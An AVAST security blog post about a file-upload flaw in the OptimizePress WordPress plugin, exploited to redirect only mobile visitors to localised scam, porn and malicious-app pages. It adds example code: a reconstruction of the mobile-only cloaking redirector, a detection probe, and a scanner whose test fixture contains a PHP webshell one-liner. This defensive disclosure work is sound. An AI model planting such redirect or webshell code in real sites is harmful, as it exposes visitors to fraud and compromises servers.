
April 17th, 2014

WordPress plugin vulnerability puts mobile visitors at risk

AVAST finds new twist on WordPress plugin vulnerability

Today one of our colleagues came into our office and said, “Hey guys, I’ve been infected.” I thought to myself, yeah, how bad can this be? After a bit of digging we found the results were worth it: it turned out to be a really “interesting” case of redirects that target mobile visitors only and are localized for each country.

All you need is one bad IP

The case was brought to us by Jakub Carda, a fellow AVAST employee who blogs in his free time. His WordPress site was compromised through a vulnerability not in WordPress itself but in a third-party plugin, OptimizePress. OptimizePress integrates itself fully into the WordPress CMS and helps bloggers optimize their blog’s design. A small mistake in one of its files, lib/admin/media-upload.php, made it possible for pretty much anyone to upload harmful content (such as PHP code) onto sites running the plugin, and plenty of websites have been compromised because of it.

Jakub’s site was compromised by an unusual redirector that exploited this upload bug. What makes it unusual is that it tells PC visitors apart from visitors on mobile devices and only redirects the mobile ones. Combined with the fact that the code also recognizes the mobile visitor’s location and sends them to pages localized for their country, this makes for an interesting case. By inspecting the injected code further we were able to find the IP address behind all the trouble:

[Image: the IP address found in the injected code]

Not so pleasant surprise for mobile WordPress site visitors

If you open an infected WordPress site from a PC you get the normal page, but mobile users should watch out. Accessing Jakub’s website (and plenty of other WordPress sites) from a mobile device redirected us to the root of the problem: an IP address hosting a script with a lot of options for compromising visitor security, including tricking users into paying money, knowingly and unknowingly.

On that server a script recognized the visitor’s location and, based on it, decided where to send the visitor next. We dug up plenty of threats across multiple websites: everything from porn sites to fake applications to fake antivirus pages that tried to sneak onto users’ devices. I picked three at random to show what kind of threats await mobile users, sorted by how dangerous they are.
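To make the mechanism described in the two paragraphs above concrete, here is an added reconstruction of the decision the redirector makes (this is example code written for this page, not the code found on Jakub’s site, and AVAST did not publish the injected script). It assumes the mobile/PC split is done on the browser’s User-Agent header, which is the usual way; the user-agent tokens, the IP-prefix country table and the landing URLs are made up for illustration:

```python
"""Reconstruction of a mobile-only, geo-localised redirect hook.

Added example for this page, not the injected code from the compromised
site. Assumptions: the mobile check is a User-Agent substring match, the
country comes from a GeoIP-style lookup (stubbed with a constructed
prefix table), and the landing URLs below are invented."""
import re
from typing import Optional

# Substrings the cloaking check looks for in the User-Agent header. Any
# desktop browser, and any crawler identifying as one, falls through.
MOBILE_UA_TOKENS = re.compile(
    r"android|iphone|ipod|ipad|blackberry|windows phone|opera mini|mobile",
    re.IGNORECASE,
)

# Hypothetical per-country landing pages (the campaign used one IP with a
# localised page per country; these URLs are assumptions).
LOCALISED_LANDING = {
    "CZ": "http://landing.example/cz/",
    "DE": "http://landing.example/de/",
    "US": "http://landing.example/us/",
}
DEFAULT_LANDING = "http://landing.example/intl/"

# Constructed stand-in for a GeoIP database: (prefix, country code).
_GEO_PREFIXES = [("85.", "CZ"), ("91.", "DE"), ("8.8.", "US")]


def is_mobile(user_agent: str) -> bool:
    """True when the User-Agent looks like a phone or tablet browser."""
    return bool(MOBILE_UA_TOKENS.search(user_agent or ""))


def geo_lookup(client_ip: str) -> Optional[str]:
    """Return an ISO country code for the client IP, or None if unknown."""
    for prefix, cc in _GEO_PREFIXES:
        if client_ip.startswith(prefix):
            return cc
    return None


def choose_redirect(user_agent: str, client_ip: str) -> Optional[str]:
    """Return the Location the redirector would emit, or None when the
    visitor is left on the legitimate page (desktop browsers, crawlers)."""
    if not is_mobile(user_agent):
        return None
    return LOCALISED_LANDING.get(geo_lookup(client_ip), DEFAULT_LANDING)


def handle_request(headers: dict, client_ip: str) -> dict:
    """What the injected hook does per request: either a 302 with a
    Location header, or the original blog page unchanged."""
    target = choose_redirect(headers.get("User-Agent", ""), client_ip)
    if target is None:
        return {"status": 200, "headers": {}, "body": "<!-- blog content -->"}
    return {"status": 302, "headers": {"Location": target}, "body": ""}


if __name__ == "__main__":
    desktop = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 Chrome/34.0"
    phone = "Mozilla/5.0 (Linux; Android 4.4; Nexus 5) AppleWebKit/537.36 Mobile Safari/537.36"
    print(handle_request({"User-Agent": desktop}, "85.1.2.3"))   # normal page
    print(handle_request({"User-Agent": phone}, "85.1.2.3"))     # 302 to the CZ page
    print(handle_request({"User-Agent": phone}, "203.0.113.5"))  # 302 to the fallback page
```

The point to take from it is in `choose_redirect`: a desktop browser, a URL scanner, or `curl` with its default User-Agent all get `None`, so the site looks clean to anything that is not a phone.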

  1. Porn sites

No actual harm is done, but it is quite annoying to be redirected to a porn website when you were trying to reach a “clean” page. You probably won’t be satisfied in this case, and it is definitely NSFW.

[Screenshot: porn site a mobile visitor is redirected to]

  2. Fake anti-virus

This website, to which mobile visitors of infected WordPress sites are redirected, tries to make you believe that your device is infected and charges you via SMS to “clean” your phone. Luckily there is still no immediate harm to the device, other than the attempt to convince you it is infected and to get you to pay for their “service.”

[Screenshot: fake antivirus page asking for payment by SMS]

  3. Harmful apps

The third and worst redirect leads to porn apps that ask users to install them on their devices. Although users have to approve the installation before the app can do any harm, once installed they are quite vicious. I analyzed a few of them and found that most requested permissions capable of stalking users (location and contacts), sending premium SMS, and even becoming device administrator, which makes the app hard to remove.

[Screenshot: porn app prompting the user to install it]

Here are some of the other domains the IP address redirects users to; as I said, there were plenty more, each localized for a different country.

[Image: seven of the redirect destination URLs]

How to protect yourself from the trap

This kind of threat is fairly unique in that it targets mobile users of WordPress sites. As I said at the beginning, users accessing the same sites from PCs were not affected. This is probably why the attackers chose this method: most antivirus companies rate web addresses by crawling them, and a crawler that presents itself as a desktop browser never sees the redirect, so the website appears harmless.
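The check that catches this is a differential one: request the page twice, once as a desktop browser and once as a phone, do not follow redirects, and compare where each request is sent. Below is an added example of such a probe (written for this page, not an AVAST tool). The fetcher is injectable so the demo runs offline on constructed responses; `live_fetch` uses only the standard-library `urllib` and the hostnames and IP in the fake responses are made up:

```python
"""Differential probe for user-agent cloaked redirects.

Added example for this page, not AVAST tooling. Fetches a URL once with a
desktop User-Agent and once with a mobile one, without following 3xx,
and reports when only the mobile request is sent off-site. The sample
responses in _FAKE are constructed, not captured from a real site."""
import urllib.error
import urllib.request
from typing import Callable, Dict, Tuple
from urllib.parse import urlsplit

DESKTOP_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 Chrome/34.0 Safari/537.36"
MOBILE_UA = "Mozilla/5.0 (Linux; Android 4.4; Nexus 5) AppleWebKit/537.36 Mobile Safari/537.36"

Response = Tuple[int, Dict[str, str]]          # (status, lower-cased headers)
Fetcher = Callable[[str, str], Response]      # (url, user_agent) -> Response


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Stop urllib from following 3xx so the Location header stays visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch(url: str, user_agent: str) -> Response:
    """Real fetcher: one request, redirects disabled, 15 s timeout."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    try:
        with opener.open(req, timeout=15) as resp:
            return resp.getcode(), {k.lower(): v for k, v in resp.headers.items()}
    except urllib.error.HTTPError as e:   # 3xx land here once redirects are disabled
        return e.code, {k.lower(): v for k, v in e.headers.items()}


def _offsite(url: str, location: str) -> bool:
    """True when Location points at a different host than the page itself."""
    src, dst = urlsplit(url), urlsplit(location)
    return bool(dst.netloc) and dst.netloc.lower() != src.netloc.lower()


def probe(url: str, fetch: Fetcher = live_fetch) -> dict:
    """Compare desktop and mobile responses for the same URL."""
    d_status, d_hdr = fetch(url, DESKTOP_UA)
    m_status, m_hdr = fetch(url, MOBILE_UA)
    d_loc, m_loc = d_hdr.get("location", ""), m_hdr.get("location", "")
    desktop_offsite = 300 <= d_status < 400 and _offsite(url, d_loc)
    mobile_offsite = 300 <= m_status < 400 and _offsite(url, m_loc)
    return {
        "desktop": (d_status, d_loc),
        "mobile": (m_status, m_loc),
        # Only the phone is bounced elsewhere: the cloaking pattern from the post.
        "cloaked_redirect": mobile_offsite and not desktop_offsite,
    }


# Constructed responses: a compromised blog and a clean site with an
# ordinary http->https redirect that applies to everyone.
_FAKE = {
    ("http://blog.example/", DESKTOP_UA): (200, {"content-type": "text/html"}),
    ("http://blog.example/", MOBILE_UA): (302, {"location": "http://203.0.113.7/go.php?c=cz"}),
    ("http://clean.example/", DESKTOP_UA): (301, {"location": "https://clean.example/"}),
    ("http://clean.example/", MOBILE_UA): (301, {"location": "https://clean.example/"}),
}


def fake_fetch(url: str, user_agent: str) -> Response:
    return _FAKE[(url, user_agent)]


if __name__ == "__main__":
    for u in ("http://blog.example/", "http://clean.example/"):
        print(u, probe(u, fake_fetch))
```

Note that a same-host redirect (plain `http` to `https`, or to a mobile theme on the same domain) is deliberately not flagged; only a redirect that leaves the site for the mobile request alone counts. Redirects injected via JavaScript rather than a Location header would need the page body compared as well.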

As I write this post, no other antivirus blocks this IP and the sites it redirects to for mobile users; avast! Mobile Security does, keeping AVAST users safe. WordPress publishers running OptimizePress should delete the file media-upload.php for now and contact OptimizePress for a fixed version. Removing the upload endpoint closes the door but does not undo what already came through it: also check wp-content/uploads for PHP files that should not be there, and check your theme and plugin files for injected code.
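For the clean-up step above, here is an added triage script (written for this page; it is not an AVAST or OptimizePress tool). It walks a WordPress tree and flags PHP files sitting under wp-content/uploads, where an upload bug would have written attacker files, and PHP files anywhere that test the User-Agent and emit a redirect, or decode an obfuscated payload, which is the shape of the redirector described in this post. The sample site it scans is constructed in a temporary directory, and the patterns are heuristics, not signatures for this particular campaign:

```python
"""Post-compromise triage for a WordPress tree.

Added example for this page, not a tool from AVAST or OptimizePress.
The fixture built by build_fixture() is constructed sample data, not
real malware; the regexes are generic heuristics."""
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

PHP_EXT = {".php", ".phtml", ".php5"}
UA_CHECK = re.compile(r"HTTP_USER_AGENT", re.I)
REDIRECT = re.compile(r"header\s*\(\s*['\"]Location:|wp_redirect\s*\(", re.I)
OBFUSCATION = re.compile(r"base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(|eval\s*\(", re.I)


def scan_file(path: Path) -> List[str]:
    """Return the reasons a PHP file looks suspicious (empty if none)."""
    reasons = []
    if "wp-content/uploads/" in path.as_posix() and path.suffix.lower() in PHP_EXT:
        reasons.append("php-in-uploads")           # uploads should hold media, not code
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return reasons
    if UA_CHECK.search(text) and REDIRECT.search(text):
        reasons.append("ua-conditional-redirect")  # the cloaking pattern from the post
    if OBFUSCATION.search(text):
        reasons.append("obfuscated-payload")
    return reasons


def scan_tree(root: Path) -> List[Tuple[str, List[str]]]:
    """Scan every PHP file below root; return (relative path, reasons)."""
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in PHP_EXT:
            reasons = scan_file(p)
            if reasons:
                findings.append((p.relative_to(root).as_posix(), reasons))
    return findings


def build_fixture(root: Path) -> None:
    """Constructed sample site: a clean theme file, a theme file with an
    injected mobile redirect, a PHP dropper disguised as an image, and a
    real image. Hostnames and IPs are invented."""
    files = {
        "wp-content/themes/twentyfourteen/header.php":
            "<?php get_header(); ?>\n",
        "wp-content/themes/twentyfourteen/functions.php":
            "<?php\nif (preg_match('/android|iphone/i', $_SERVER['HTTP_USER_AGENT'])) {\n"
            "  header('Location: http://203.0.113.7/go.php'); exit; }\n",
        "wp-content/uploads/2014/04/image.jpg.php":
            "<?php eval(base64_decode($_POST['x'])); ?>\n",
        "wp-content/uploads/2014/04/photo.jpg": "not php",
    }
    for rel, body in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)


def demo() -> List[Tuple[str, List[str]]]:
    """Build the fixture in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, ", ".join(reasons))
```

Run it against the real document root with `scan_tree(Path("/var/www/html"))`. Treat the output as a list of files to read, not a verdict: legitimate plugins also sniff the User-Agent, so the final check is comparing each flagged plugin or theme file against a fresh copy of the same version.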


 

  1. April 18th, 2014 at 07:47 | #1

    That’s okay, but is it good to call it a WordPress Vulnerability? This is a 3rd party plugin and the vulnerability only lies in it. And why should one contact WordPress when the vulnerability is in a plugin? WordPress.org does not control the content of the plugins.

    I understand that you always want to promote your products. But this? At least change the title to “WordPress PLUGIN vulnerability puts mobile visitors at risk” -_-

  2. maximan
    April 21st, 2014 at 12:24 | #2

    Hello!
    Mobiteasy.com is a legal mobile affiliate network. There are no illegal viruses or any such thing on this site. It is a platform for mobile traffic monetization. Our affiliates send their redirects and we send them directly to the mobile offers. All offers are legal and famous!! But they are adult, yes.
    I’ve contacted avast support to resolve the problem.

  3. April 24th, 2014 at 14:48 | #3

    @maximan
    Hello, mobiteasy.com is not blocked anymore. But this malware redirects users there. I’m not saying it’s your fault but users were redirected there without their knowledge.
